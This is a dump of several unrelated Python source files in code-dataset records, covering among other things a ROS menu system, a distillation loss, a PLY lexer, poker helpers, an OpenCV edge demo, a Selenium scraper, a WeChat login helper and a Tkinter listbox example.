error=False):\n \"\"\"Utility function to get config value specified by name.\n if value is not exists return 'default' value\n if error is True and value is not exists raise KeyError\n \"\"\"\n if name in config:\n return config[name]\n elif error:\n raise KeyError(\"Config does not have '%s'\"%name)\n return default\n\n @staticmethod\n def create_menu(menu_obj, config, identifier=None, title=None, usage=None, parent=None):\n if not config:\n return None\n \n \"\"\"Create menu from config\"\"\"\n # refer menu\n menu = config[\"menu\"] if \"menu\" in config else None\n if menu is not None:\n config2 = menu_obj[menu] if menu in menu_obj else []\n return Menu.create_menu(menu_obj, config2, identifier=menu, title=title, usage=usage, parent=parent)\n\n # otherwise\n _type = Menu.get_menu_config(config, \"type\", \"item\")\n\n if _type == \"list\":\n return MenuList(menu_obj, config, identifier=identifier, parent=parent)\n elif _type == \"adjust\":\n return MenuAdjust(config, identifier=identifier, parent=parent)\n elif _type == \"item\":\n return MenuItem(config, identifier=identifier, parent=parent)\n\n raise ValueError(\"%s is not a menu type\" % (_type))\n\n\n def __init__(self, config=None, identifier=None, parent=None):\n self._title = Menu.get_menu_config(config, \"title\")\n self._usage = Menu.get_menu_config(config, \"usage\")\n self._type = Menu.Undefined\n self._config = config\n self._identifier = identifier\n self._parent = parent\n self._items = []\n self._actions = None\n self._listeners = []\n self.delegate = None\n CaBotRclpyUtil.info(\"creating SetParameters client\")\n self.set_client = CaBotRclpyUtil.instance().node.create_client(SetParameters, \"/parameter_server/set_parameters\", callback_group=MutuallyExclusiveCallbackGroup())\n CaBotRclpyUtil.info(\"creating GetParameters client\")\n self.get_client = CaBotRclpyUtil.instance().node.create_client(GetParameters, \"/parameter_server/get_parameters\", callback_group=MutuallyExclusiveCallbackGroup())\n CaBotRclpyUtil.info(f\"menu initialization complete {self._title}\")\n\n\n def __str__(self):\n text = \"\"\n if self._type == Menu.List:\n text += \"Menu List (%s, %s)\\n\" % (self._identifier, self._title) \\\n + \"\\n\".join([\" \"+str(x) for x in self._items])\n elif self._type == Menu.Action:\n text += \"Menu Action (%s, %s)\" % (self._identifier, self._title)\n elif self._type == Menu.Adjust:\n text += \"Menu Adjust (%s, %s)\" % (self._identifier, self._title)\n else:\n text += super(Menu, self).__str__()\n if self._actions is not None:\n text += \"\\n with Action (%s)\" % (self._actions)\n return text\n\n @property\n def identifier(self):\n \"\"\"Menu identifier\"\"\"\n return self._identifier\n\n @property\n def type(self):\n \"\"\"Menu type\"\"\"\n return self._type\n\n @property\n def title(self):\n \"\"\"Menu title\"\"\"\n return i18n.localized_string(self._title)\n\n @property\n def usage(self):\n \"\"\"Menu usage which is read by TTS\"\"\"\n return i18n.localized_string(self._usage)\n\n @property\n def description(self):\n \"\"\"Description of the menu\"\"\"\n return i18n.localized_string(self._title)\n\n @property\n def value(self):\n \"\"\"Value of the menu\"\"\"\n return None\n\n def sev_value(self, value):\n raise RuntimeError(\"not implemented\")\n\n @property\n def can_explore(self):\n return False\n\n def next(self):\n \"\"\"Move to next item or value\"\"\"\n pass\n\n def prev(self):\n \"\"\"Move to previous item or value\"\"\"\n pass\n\n def select(self):\n \"\"\"Do action for selection\"\"\"\n return self\n\n def reset(self):\n \"\"\"Reset for reuse\"\"\"\n pass\n\n def _menu_selected(self, origin):\n \"\"\"menu selected\"\"\"\n if self.delegate:\n self.delegate.menu_selected(origin)\n if self._parent is not None:\n self._parent._menu_selected(origin)\n\n\nclass MenuList(Menu):\n \"\"\"List of Menu items\"\"\"\n def __init__(self, menu_obj, config=None, identifier=None, parent=None):\n if Menu.get_menu_config(config, \"usage\") is None:\n config[\"usage\"] = \"MENU_NAVIGATE_USAGE\"\n super(MenuList, self).__init__(config=config, identifier=identifier, parent=parent)\n\n self._type = Menu.List\n self._actions = Actions.create_actions(config, self)\n\n temp = []\n items = Menu.get_menu_config(config, \"items\")\n for item in items:\n menu_item = Menu.create_menu(menu_obj, item, parent=self)\n if menu_item:\n temp.append(menu_item)\n else:\n CaBotRclpyUtil.error(\"menu {} is not found\".format(item))\n self._items = temp\n self._current = None\n\n def _get_item(self, diff, default):\n if self._current is None:\n self._current = default\n else:\n self._current = (self._current + diff) % len(self._items)\n\n if self._current is None:\n return None\n return self._items[self._current]\n\n @property\n def value(self):\n \"\"\"Current value\"\"\"\n return self._get_item(0, None)\n\n @property\n def can_explore(self):\n return True\n \n def next(self):\n return self._get_item(+1, 0)\n\n def prev(self):\n return self._get_item(-1, -1)\n\n def select(self):\n if self._actions is not None:\n self._actions.do_action()\n \n return self.value\n\n def get_menu_by_identifier(self, identifier):\n for item in self._items:\n if item._identifier == identifier:\n return item\n return None\n \n @property\n def description(self):\n #return self.value.title if self.value is not None else \"not selected\"\\\n return i18n.localized_string(self.value._title) if self.value is not None else None\n\n def reset(self):\n self._current = None\n for item in self._items:\n item.reset()\n\nclass MenuAdjust(Menu):\n \"\"\"Adjustable menu\"\"\"\n def __init__(self, config=None, identifier=None, parent=None):\n super(MenuAdjust, self).__init__(config=config, identifier=identifier, parent=parent)\n self._type = Menu.Adjust\n self._max = Menu.get_menu_config(config, \"max\", error=True)\n self._min = Menu.get_menu_config(config, \"min\", error=True)\n self._values = Menu.get_menu_config(config, \"values\")\n if self._values is not None:\n self._format = Menu.get_menu_config(config, \"format\", default=\"{}\")\n else:\n self._format = Menu.get_menu_config(config, \"format\", default=\"{}\")\n if self._min >= self._max:\n raise ValueError(\"min value should be smaller than max value \" \\\n + \"(%f < %f)\"%(self._min, self._max))\n\n self._default = Menu.get_menu_config(config, \"default\", error=True)\n if self._default < self._min or self._max < self._default:\n raise ValueError(\"default value should be in min-max range \" \\\n + \"(%f < %f < %f\" % (self._min,\n self._default,\n self._max))\n\n self._step = Menu.get_menu_config(config, \"step\", 1)\n self._name = Menu.get_menu_config(config, \"name\", error=True)\n self._current = self._get_saved_current()\n self._actions = Actions.create_actions(config, self)\n self._check_action_once()\n \n def _check_action(self):\n if self._actions is None:\n return\n if self._actions.do_action():\n return\n CaBotRclpyUtil.info(\"retry do_action with %s\", str(self))\n self._check_action_once()\n\n @cabot_common.util.setInterval(3, 1)\n def _check_action_once(self):\n self._check_action()\n\n\n def _get_saved_current(self):\n temp = self._get_saved_config(self._name, default=self._default)\n if hasattr(self, \"_values\") and self._values is not None and isinstance(temp, str):\n temp = self._values.index(temp)\n return temp if temp is not None else self._default\n\n def _save_current(self):\n if self._actions is not None:\n self._actions.do_action()\n return self._save_config(self._name, self.value)\n\n @property\n def value(self):\n \"\"\"Current value\"\"\"\n if self._values:\n return self._values[self._current]\n return self._current\n\n def set_value(self, value):\n if self._values:\n self._current = self._values.index(value)\n else:\n self._current = value\n self._save_current()\n\n @property\n def can_explore(self):\n return True\n\n @property\n def min(self):\n \"\"\"Minimum value\"\"\"\n return self._min\n\n @property\n def max(self):\n \"\"\"Maximum value\"\"\"\n return self._max\n\n ## intentionally opposite\n def next(self): \n self._current = max(self._current - self._step, self._min)\n self._save_current()\n return self._current\n\n def prev(self):\n self._current = min(self._current + self._step, self._max)\n self._save_current()\n return self._current\n\n def select(self):\n return self\n\n @property\n def description(self):\n CaBotRclpyUtil.info(f\"{self._format}, {self._current}, {self.value}\")\n return i18n.localized_string(self._format, i18n.localized_string(self.value)) \n #\" \" + i18n.localized_string(self._title))\n\n def reset(self):\n self._current = self._get_saved_current()\n\nclass MenuItem(Menu):\n \"\"\"Menu item with action\"\"\"\n def __init__(self, config=None, identifier=None, parent=None):\n super(MenuItem, self).__init__(config=config, identifier=identifier, parent=parent)\n self._type = Menu.Action\n self._value = Menu.get_menu_config(config, \"value\")\n self._format = Menu.get_menu_config(config, \"format\", \"MENU_ITEM_SELECTED\")\n\n @property\n def description(self):\n return i18n.localized_string(self._format, i18n.localized_string(self._title))\n\n @property\n def value(self):\n return self._value\n\n @property\n def can_explore(self):\n return False\n\n def reset(self):\n pass\n\n def select(self):\n pass\n","repo_name":"CMU-cabot/cabot-navigation","sub_path":"cabot_ui/cabot_ui/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":18702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42724622525","text":"import torch\nimport torch.nn as nn\n\nclass SoftTargetLoss(nn.Module):\n '''\n Distilling the knowledge in a Neural Network\n https://arxiv.org/abs/1503.02531\n '''\n def __init__(self, T=10):\n super().__init__()\n self.T = T\n \n def forward(self, logits, targets, t):\n '''\n logits : output of the student\n targets: output of the teacher\n t : correct label\n '''\n logits = logits / self.T\n targets = targets / self.T\n soft_loss = nn.KLDivLoss(reduction='batchmean')\n hard_loss = nn.CrossEntropyLoss()\n p = nn.Softmax(dim=1)\n q = nn.LogSoftmax(dim=1)\n kd_loss = soft_loss(q(logits), p(targets)) + hard_loss(logits, t)\n return kd_loss\n \nif __name__ == '__main__':\n logits = torch.randn((32,10))\n targets = torch.randn((32,10))\n t = torch.randint(0, 10, (32,))\n loss = SoftTargetLoss()\n kd_loss = loss(logits, targets, t)\n print(kd_loss)\n print(loss.T)","repo_name":"motakuss/Knowledge-Distillation-Technique","sub_path":"src/kd_loss/st.py","file_name":"st.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22825837271","text":"import json\nimport pickle\nimport re\nimport numpy as np\nfrom string import punctuation\n\nwith open('../../../data/fever/support/main.json','r') as f:\n total = json.load(f)\n\n\ndef filterfun(word):\n if word in punctuation:\n return False\n else:\n return True\n\n\nclaims = []\nsentences = []\nfor i in range(len(total)):\n claims += re.sub(r'[^\\w\\s]','',total[i]['claim'].lower()).split()\n claims.append('\\n')\n sentences += re.sub(r'[^\\w\\s]','',total[i]['sentence'].lower()).split()\n sentences.append('\\n')\n\n#filtered = filter(filterfun,claims)\n#claims = []\n#for i in filtered:\n# claims.append(i)\n\n#filtered = filter(filterfun,sentences)\n#sentences = []\n#for i in filtered:\n# sentences.append(i)\n\nclaims = ' '.join(claims)\nclaims = ''.join(claims).split('\\n')\ntemp = ' '.join(claims).split()\nsentences = ' '.join(sentences)\nsentences = ''.join(sentences).split('\\n')\ntemp += ' '.join(sentences).split()\nwords = list(set(temp))\nvocab_to_int = dict()\n\n\nfor i in range(len(words)):\n vocab_to_int.update({words[i]: i})\n\nsent_ints = []\nclaim_ints = []\nlabels = []\nmxclaim = 0\nmxsent = 0\nfor i in range(len(total)):\n s = sentences[i]\n c = claims[i]\n if len(s) > mxsent:\n mxsent = len(s)\n if len(c) > mxclaim:\n mxclaim = len(c)\n sent_ints.append([vocab_to_int[word] for word in s.split()])\n claim_ints.append([vocab_to_int[word] for word in c.split()])\n labels.append(total[i]['lablel'])\n\n\nclaim_features = np.zeros((len(claim_ints), mxclaim), dtype=int)\nsent_features = np.zeros((len(sent_ints), mxsent), dtype=int)\n\nfor i, row in enumerate(claim_ints):\n claim_features[i, -len(row):] = np.array(row)[:mxclaim]\n\nfor i, row in enumerate(sent_ints):\n sent_features[i, -len(row):] = np.array(row)[:mxsent]\n\nwith open('../../../data/fever/support/train.pkl','rb') as f:\n train = pickle.load(f)\nwith open('../../../data/fever/support/val.pkl','rb') as f:\n val = pickle.load(f)\n\ntrain_claim = []\ntrain_sent = []\nval_claim = []\nval_sent = []\n\nfor i in val['lablel'].keys():\n val_claim.append(claim_features[i])\n val_sent.append(sent_features[i])\n\nfor i in train['lablel'].keys():\n train_claim.append(claim_features[i])\n train_sent.append(sent_features[i])\n\n","repo_name":"DeFacto/SimpleLSTM","sub_path":"models/SimpleLSTM/support/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"26614734393","text":"import math \n\nn = int(input())\n\nmax_L = -float(\"inf\")\nmin_R = float(\"inf\")\n\nfor i in range(n):\n l, r = map(int, input().split())\n max_L = max(max_L, l)\n min_R = min(min_R, r)\n\n if max_L <= min_R:\n print(0)\n else:\n tmp = math.ceil(abs(max_L-min_R)/2)\n print(tmp)\n","repo_name":"mei28/Competitive-programing","sub_path":"ARC-129/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75191741226","text":"import ply.lex as lex\nfrom src.toks import Token\n\n\nclass Lexer:\n def __init__(self):\n self.tokens = Token.tokens\n self.vars = {}\n self.lexer = None\n \n t_ignore = ' \\t'\n t_PLUS = r'\\+'\n t_MINUS = r'\\-'\n t_TIMES = r'\\*'\n t_DIVIDE = r'\\/'\n t_POWER = r'\\*\\*'\n t_LPAREN = r'\\('\n t_RPAREN = r'\\)'\n t_ASSIGN = r'\\='\n t_EQT = r'\\=\\='\n t_NEQ = r'\\!\\='\n t_LT = r'\\<'\n t_GT = r'\\>'\n t_ELT = r'\\<\\='\n t_EGT = r'\\>\\='\n t_SEMICOLON = r'\\;'\n\n def t_IDENTIFIER(self, t):\n r'[a-zA-Z_\\u0600-\\u06FF][a-zA-Z0-9_\\u0600-\\u06FF]*'\n if t.value == 'متغير':\n t.type = 'VAR'\n return t\n \n if t.value == 'صح' or t.value == 'خطا':\n \n if t.value == 'صح':\n t.value = True\n else:\n t.value = False\n t.type = 'BOOL'\n return t\n \n if t.value == 'و':\n t.type = 'AND'\n return t\n \n if t.value == 'او':\n t.type = 'OR'\n return t\n \n if t.value == 'ليس':\n t.type = 'NOT'\n return t\n \n t.type = 'IDENTIFIER'\n return t\n \n def t_FLOAT(self, t):\n r'\\d+\\.\\d+'\n t.value = float(t.value)\n t.type = 'FLOAT'\n return t\n\n def t_INT(self, t):\n r'\\d+'\n t.value = int(t.value)\n t.type = 'INT'\n return t\n \n def t_NEWLINE(self, t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n return t\n\n def t_error(self, t):\n print(f\"Illegal character '{t.value[0]}'\")\n t.lexer.skip(1)\n\n def build(self, **kwargs):\n self.lexer = lex.lex(module=self, **kwargs)\n \nif __name__ == \"__main__\":\n lexer = Lexer()\n lexer.build()\n lexer.lexer.input(\"متغير ا = 10 \\n ا + 10 * 2\")\n for token in lexer.lexer:\n print(token)\n","repo_name":"GNMohamed1/Qalam","sub_path":"src/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20404328856","text":"\ndef rothess(h):\n hr=np.zeros_like(h)\n ridx={0:0,1:1,2:3,3:4,4:2}\n for i in range(5):\n for j in range(5):\n hr[i,j]=r.apply(r.apply(h[ridx[i],ridx[j]]).T).T\n return hr\ndef rotgrad(g):\n b=r.apply(g)\n b[[2,3,4]]=b[[3,4,2]]\n return b \n","repo_name":"ferchault/APDFT","sub_path":"prototyping/hessian/AAFF_backup/Libs/AP_symmetry.py","file_name":"AP_symmetry.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"35514139461","text":"import adventofcode.util as util\n\ndef get_elves_by_calorie_count(data):\n elves = []\n calories = 0\n for line in data:\n if len(line) == 0:\n elves.append(calories)\n calories = 0\n else:\n calories = calories + int(line)\n return elves\n\n\nif __name__ == '__main__':\n data = util.read_input('input.txt')\n elves = get_elves_by_calorie_count(data)\n\n max_value = max(elves)\n index = elves.index(max_value)\n\n total_kcal = 0;\n for i in range(3):\n current_max = max(elves)\n total_kcal += current_max\n elves.remove(current_max)\n\n print(total_kcal)\n\n\n\n","repo_name":"johan-ronnkvist/advent-of-code","sub_path":"adventofcode/day_01/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36537520378","text":"import numpy as np\nimport torch\nimport pickle\n\ndef load_dictionary(filename):\n\twith open(filename + '.pkl', 'rb') as f:\n\t\treturn pickle.load(f)\n\ndef pusherLoss(pushPerc, callPerc, stackSize, equity):\n\tloss = torch.mean((-1)*(-0.5*(1-pushPerc) + pushPerc*(1*(1-callPerc) + (2*stackSize*equity - stackSize)*callPerc)))\n\treturn loss\n\ndef callerLoss(pushPerc, callPerc, stackSize, equity):\n\tloss = torch.mean((-1)*(0.5*(1-pushPerc) + pushPerc*(-1*(1-callPerc) + (2*stackSize*(1-equity) - stackSize)*callPerc)))\n\treturn loss\n\ndef pusherLossNumpy(pushPerc, callPerc, stackSize, equity):\n\tloss = np.mean((-1)*(-0.5*(1-pushPerc) + pushPerc*(1*(1-callPerc) + (2*stackSize*equity - stackSize)*callPerc)))\n\treturn loss\n\ndef callerLossNumpy(pushPerc, callPerc, stackSize, equity):\n\tloss = np.mean((-1)*(0.5*(1-pushPerc) + pushPerc*(-1*(1-callPerc) + (2*stackSize*(1-equity) - stackSize)*callPerc)))\n\treturn loss\n\n# Cards should be rank followed by suit ('As', '7c', etc)\n# Puts cards in rank order and tells if they are suited ('AAu', '98s', etc)\ndef processHand(card1, card2, ranks):\n\thand = ''\n\tif(ranks.index(card1[0]) < ranks.index(card2[0])):\n\t\thand = hand + card1[0] + card2[0]\n\telse:\n\t\thand = hand + card2[0] + card1[0]\n\tif(card1[1] == card2[1]):\n\t\thand = hand + 's'\n\telse:\n\t\thand = hand + 'u'\n\treturn hand\n\ndef oneHotCard(card, ranks):\n\toneHot = np.zeros((1, 13))\n\toneHot[0, ranks.index(card[0])] = 1\n\treturn oneHot\n\n# 's' = suited, 'u' = offsuit, 3rd catagory for pairs\ndef oneHotSuited(suited, card1Rank, card2Rank):\n\toneHot = np.zeros((1, 3))\n\tif(suited == 's'):\n\t\toneHot[0, 0] = 1\n\telse:\n\t\tif(card1Rank != card2Rank):\n\t\t\toneHot[0, 1] = 1\n\t\telse:\n\t\t\toneHot[0, 2] = 1\n\treturn oneHot","repo_name":"rfick/push_fold_solver","sub_path":"push_fold_helper_functions.py","file_name":"push_fold_helper_functions.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21278239915","text":"import cv2\n\n# Read the original image\ndef getCanny(img):\n\t# Convert to graycsale\n\timg_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t# Blur the image for better edge detection\n\timg_blur = cv2.GaussianBlur(img_gray, (3,3), 0) \n\n\t# Sobel Edge Detection\n\tsobelx = cv2.Sobel(src=img_blur, ddepth=cv2.CV_64F, dx=1, dy=0, ksize=5) # Sobel Edge Detection on the X axis\n\tsobely = cv2.Sobel(src=img_blur, ddepth=cv2.CV_64F, dx=0, dy=1, ksize=5) # Sobel Edge Detection on the Y axis\n\tsobelxy = cv2.Sobel(src=img_blur, ddepth=cv2.CV_64F, dx=1, dy=1, ksize=5) # Combined X and Y Sobel Edge Detection\n\t# Display Sobel Edge Detection Images\n\t#cv2.imshow('Sobel X', sobelx)\n\t#cv2.waitKey(0)\n\t#cv2.imshow('Sobel Y', sobely)\n\t#cv2.waitKey(0)\n\t#cv2.imshow('Sobel X Y using Sobel() function', sobelxy)\n\t#cv2.waitKey(0)\n\n\t# Canny Edge Detection\n\tedges = cv2.Canny(image=img_blur, threshold1=100, threshold2=200) # Canny Edge Detection\n\t# Display Canny Edge Detection Image\n\t# cv2.imshow('Canny Edge Detection', edges)\n\treturn edges,sobelxy\n\t\n\n\n\n\nif __name__ == \"__main__\":\n\n vid = cv2.VideoCapture(0)\n\n NOT_CLOSE = \"NOT_CLOSE\"\n CLOSE = \"CLOSE\"\n tme = 0\n while True:\n ret, frame = vid.read()\n cv2.imshow('frame',frame)\n canny,sobelx = getCanny(frame)\n cv2.imshow('canny',canny)\n cv2.imshow('sobelx',sobelx)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n vid.release()\n cv2.destroyAllWindows()\n","repo_name":"Neotez/Control-Flow","sub_path":"new_edge.py","file_name":"new_edge.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35633806896","text":"from time import sleep\r\n\r\nfrom lxml.html import fromstring, tostring\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\n\r\nif __name__ == \"__main__\":\r\n url = \"https://iirmephi.ru/tutorials/npp/datasource_first/\"\r\n driver = webdriver.Firefox(executable_path=r\"C:\\Users\\khvos\\OneDrive\\Рабочий стол\\Прога\\geckodriver-v0.32.0-win64\\geckodriver.exe\")\r\n driver.get(url)\r\n source = fromstring(driver.page_source)\r\n\r\n\r\n\r\n # elements = driver.find_elements(By.XPATH, '//table/thead/tr/th/a')\r\n # x = [el.text for el in elements]\r\n\r\n elements = source.xpath('//table[contains(@class, \"table-striped\")]/thead/tr/th/a/text()')\r\n # print(elements)\r\n lst = [el.lower() for el in elements]\r\n print(lst)\r\n\r\n trs = source.xpath('//table[contains(@class, \"table-striped\")]/tbody/tr')\r\n\r\n for tr in trs:\r\n row = fromstring(tostring(tr))\r\n print(row.xpath('//td/text()'))\r\n\r\n # c = {}\r\n # for i in range(len(trs)): \r\n # lines = driver.find_elements(By.XPATH, '//table/tbody/tr')\r\n # y = [line.text for line in lines]\r\n # print(y)\r\n # for i in range(len(y)):\r\n # yy = driver.find_elements(By.XPATH, '//table/tbody/tr/td[1]')\r\n # yyy = [l.text for l in yy]\r\n # print(yyy)\r\n \r\n","repo_name":"khm2609/Learning-process","sub_path":"Parsing/Tables.py","file_name":"Tables.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22331463691","text":"from ..AbstractScenario import *\n\n\nclass JoinSpaceship(Scenario):\n\n def __init__(self, character, game_running):\n super().__init__(character, game_running)\n\n def run(self):\n print(\"As you wander through the spaceport, you see three different spacecraft that are about to depart.\\n\"\n \"Which one do you want to join?\\n\")\n\n selection = choice_input([\n \"Pirate ship (+3 combat, -2 leadership, +1 engineering)\",\n \"Royal navy ship (+3 leadership, +1 combat)\",\n \"Asteroid mining vessel (+3 engineering, -2 combat, +1 piloting)\"\n ])\n\n modified_skills = {}\n selected_ship = None\n\n if selection == 1:\n print(\"You have joined a pirate ship crew!\")\n modified_skills = {\n \"leadership\": -2,\n \"combat\": 3,\n \"engineering\": 1\n }\n selected_ship = 'pirate'\n elif selection == 2:\n print(\"You have joined a royal navy crew!\")\n modified_skills = {\n \"leadership\": 3,\n \"combat\": 1,\n }\n selected_ship = 'navy'\n elif selection == 3:\n print(\"You have joined an asteroid mining vessel!\")\n modified_skills = {\n \"combat\": -2,\n \"engineering\": 3\n }\n selected_ship = 'mining'\n\n # Update the characters skills based off the selection\n for skill, value in modified_skills.items():\n try:\n self.character.skills[skill] += value\n except KeyError:\n pass\n self.character.ship = selected_ship\n # Display our stats now we're done\n self.character.display_current_stats()\n","repo_name":"MKJSmith/SciFi","sub_path":"src/scenarios/common/JoinSpaceship.py","file_name":"JoinSpaceship.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10988182827","text":"from phply.phpparse import make_parser\nfrom phply.phplex import lexer\nfrom phply import phpast as ast\n\nfrom langchain.document_loaders.parsers.language.code_segmenter import CodeSegmenter\n\n\nclass PHPSegmenter(CodeSegmenter):\n \"\"\"Code segmenter for `Python`.\"\"\"\n\n def __init__(self, code: str):\n super().__init__(code)\n self.source_lines = self.code.splitlines()\n\n\n def is_valid(self):\n try:\n parser = make_parser()\n result = parser.parse(self.code, lexer.clone())\n parser.restart()\n return True\n except AssertionError:\n return False\n except SyntaxError:\n return False\n\n def _get_line_indexes(self, node):\n start = node.lineno - 1\n inner = [n for n in node.nodes if isinstance(n, (ast.Node))]\n if len(inner) > 0:\n last_node = inner[-1]\n if isinstance(last_node, (ast.Method, ast.Class)):\n [_, end] = self._get_line_indexes(last_node)\n else:\n end = last_node.lineno\n end = end + 1\n else:\n end = node.lineno - 1\n return [start,end]\n \n def _extract_code(self, node):\n [start, end] = self._get_line_indexes(node)\n return \"\\n\".join(self.source_lines[start:end])\n\n def extract_functions_classes(self):\n functions_classes = []\n parser = make_parser()\n result = parser.parse(self.code, lexer.clone())\n parser.restart()\n\n for node in result:\n if isinstance(node, (ast.Class, ast.Function)):\n code = self._extract_code(node)\n functions_classes.append(code)\n\n return functions_classes\n\n def simplify_code(self):\n all_lines = self.source_lines[:]\n parser = make_parser()\n result = parser.parse(self.code, lexer.clone())\n parser.restart()\n\n for node in result:\n if isinstance(node, (ast.Class, ast.Function)):\n [start, end] = self._get_line_indexes(node)\n\n all_lines[start] = f'// Simplified Code for {all_lines[start]}'\n\n for i in range(start + 1, end):\n all_lines[i] = None\n\n return \"\\n\".join(line for line in all_lines if line is not None)\n","repo_name":"stuartpearce-hg/Ideagen-GenAI-Workshop","sub_path":"workshop/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33391648697","text":"\"\"\"\n Created by Amirk on 2018-07-29.\n\"\"\"\nimport json\n\nfrom flask import current_app\nimport requests\nfrom app.model.base import db\nfrom app.model.user_book_case import UserBookCase\nfrom app.model.userinfo import UserInfo\n\n\nclass RquestWxSessionKey:\n \"\"\"请求微信api 获取openid 保存用户信息到数据库\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.session_key = None\n self.appId = current_app.config['APPID']\n self.secret = current_app.config['APP_SECRET_KEY']\n self.openId = None\n self.userinfo = self.data.get('userinfo')\n self.url = f\"https://api.weixin.qq.com/sns/jscode2session?\" \\\n f\"appid={self.appId}\" \\\n f\"&secret={self.secret}\" \\\n f\"&js_code={self.data.get('code')}\" \\\n f\"&grant_type=authorization_code\"\n\n def getparse(self):\n res = requests.get(self.url).json()\n self.session_key = res.get('session_key')\n self.openId = res.get('openid')\n self.userinfo[\"openid\"] = self.openId\n return self.save_user_info()\n\n def save_user_info(self):\n user = UserInfo.query.get(self.userinfo.get('openid'))\n if not user:\n with db.auto_commit():\n user = UserInfo()\n user.openid = self.userinfo.get('openid')\n user.nickName = self.userinfo.get('nickName')\n user.avatarUrl = self.userinfo.get('avatarUrl')\n user.gender = self.userinfo.get('gender')\n user.language = self.userinfo.get('language')\n user.city = self.userinfo.get('city')\n user.province = self.userinfo.get('country')\n user.country = self.userinfo.get('country')\n db.session.add(user)\n UserBookCase.user_init_book(self.openId)\n return dict(user)\n","repo_name":"wanws/BookApplet","sub_path":"books/books/server/novel/app/plugin/requests_wx.py","file_name":"requests_wx.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28696877935","text":"\"\"\"\r\nProgram name: listbox_simple_1.py\r\nObjective: Get a reaction to a menu selection usinga mouse click.\r\n\r\nKeywords: listbox, validation, list selection\r\n============================================================================79\r\n \r\nExplanation: This is the possible the simplest and most straight-forward\noption selection mechanism.\r\nThe message printed on the screen confirms that the code works.\r\n\r\nAuthor: Mike Ohlson de Fine\r\n\r\n\"\"\"\r\n# listbox_simple_1.py\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nfrom Tkinter import *\r\nroot = Tk()\r\nroot.title(\"Listbox Data Input\")\r\n\r\ndef get_list(event):\r\n # Mouse button release callback\r\n # Read the listbox selection and put the result in an entry box widget\r\n index = listbox1.curselection()[0] # get selected line index\r\n seltext = listbox1.get(index) # get the line's text & assign to a variable\r\n enter_1.delete(0, 50) # delete previous text in enter1 otherwise the entries append to each other.\r\n enter_1.insert(0, seltext) # now display the selected text\r\n\r\n# Create the listbox (note that size is in characters)\r\nlistbox1 = Listbox(root, width=50, height=6)\r\nlistbox1.grid(row=0, column=0)\r\n\r\n# Fill the listbox with data\r\nlistbox1.insert(END, \"a list entry\")\r\nfor item in [\"one has begun\", \"two is a shoe\", \"three like a knee\", \"four to the door\"]:\r\n listbox1.insert(END, item)\r\n\r\n# use entry widget to display/edit selection\r\nenter_1 = Entry(root, width=50, bg='yellow')\r\nenter_1.insert(0, 'Click on an item in the listbox')\r\nenter_1.grid(row=1, column=0)\r\n\r\n# left mouse click on a list item to display selection\r\nlistbox1.bind('', get_list)\r\n \r\nroot.mainloop()\n","repo_name":"anyatran/school","sub_path":"CG/SciPy/listbox_simple_1.py","file_name":"listbox_simple_1.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5013864985","text":"# -*- coding: utf-8 -*-\nfrom protoExt.views import validateRequest\nfrom protoLib.getStuff import getDjangoModel\nfrom protoExt.utils.utilsBase import traceError, list2dict, getReadableError\nfrom protoExt.models import ViewDefinition\n\n\ndef doBuildFieldList(modeladmin, request, queryset):\n\n cBase, message = validateRequest( request )\n if message: return message \n \n # Get base model \n try: \n cBase.model = getDjangoModel(cBase.viewEntity)\n except :\n traceError()\n return 'model not found: {0}'.format( cBase.viewEntity ) \n \n\n # Get ProtoDefinition \n try:\n protoDef = ViewDefinition.objects.get_or_create(code=cBase.viewCode)[0]\n cBase.protoMeta = protoDef.metaDefinition\n except Exception as e:\n return getReadableError(e) \n \n # Get all fields in document \n newFieldDict = cBase.model.getJfields(None, cBase.model._jDefValueDoc )[0]\n \n # get base fieldDict \n oldFieldDict = list2dict(cBase.protoMeta[ 'fields' ], 'name')\n\n # Add all not info_fields \n for fName in oldFieldDict.keys() :\n if not fName.startswith( 'info__'): \n newFieldDict[ fName ] = oldFieldDict[ fName ]\n\n # Add fields \n 